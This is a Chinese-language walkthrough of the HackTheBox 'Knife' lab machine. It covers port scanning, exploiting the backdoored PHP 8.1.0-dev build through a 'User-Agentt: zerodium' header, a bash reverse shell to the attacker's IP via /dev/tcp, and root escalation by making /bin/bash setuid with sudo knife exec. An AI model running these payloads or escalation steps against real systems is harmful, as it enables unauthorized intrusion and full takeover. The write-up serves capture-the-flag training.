HackTheBox-Knife
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了HackTheBox-Knife相关的知识,希望对你有一定的参考价值。
连接配置
- 参考之前的文章步骤配置
LAB ACCESS
,文章链接
渗透测试
信息搜集
- 先用
Namp
扫描一下目标靶机,发现开放了22、80
两个端口
sudo nmap 10.10.10.242
![](https://image.cha138.com/20210907/d6571baeab1f41d29cae88066299c459.jpg)
- 用
dirb
扫描网站发现没有什么有用信息
![](https://image.cha138.com/20210907/5644ba62bd524841a10d74545057b26b.jpg)
漏洞挖掘
联想到题目名字应该是存在后门,查看源码和抓包分析后发现存在
php/8.1.0-dev
,该版本在2021年3月28日被植入后门,当服务器存在该后门时攻击者可以通过发送User-Agentt
头来执行任意代码
![](https://image.cha138.com/20210907/16b59af24ebd4dc28817cf95b7e348e3.jpg)
- 使用
burpsuite
抓包,并加入字段User-Agentt: zerodiumvar_dump(2*3);
,发现被成功执行
![](https://image.cha138.com/20210907/72a99e3d1b9b4bc4adbd0211e847945a.jpg)
getshell
- 起一个
nc
监听, 然后执行命令User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.16.21/1234 0>&1'");
,并将 shell 换成一个交互式的 shell
python3 -c 'import pyt;pty.spawn("/bin/bash")'
或者
SHELL=/bin/bash script -q /dev/null
![](https://image.cha138.com/20210907/3b0066dd56ca419a92c7f53e448332d2.jpg)
- 查看用户
James
家目录下拿到USER OWN
的 flag
![](https://image.cha138.com/20210907/3e8c5cebb4784c5da0d53aa933b6d6de.jpg)
提权
- 利用
sudo -l
进行提权,确定knife
用户的sudo
权限
sudo -l
ls /usr/bin/knife -al
![](https://image.cha138.com/20210907/b58bc9f9ab2f4181ac38817745a7c5b2.jpg)
- 执行命令,拿到 root 权限,在 root 目录下拿到
SYSTEM OWN
的 flag
echo "system('chmod +s /bin/bash')" > exploit.rb
sudo /usr/bin/knife exec exploit.rb
/bin/bash -p
![](https://image.cha138.com/20210907/16f773b44ac1472d8d92fd2ca3667c26.jpg)
以上是关于HackTheBox-Knife的主要内容,如果未能解决你的问题,请参考以下文章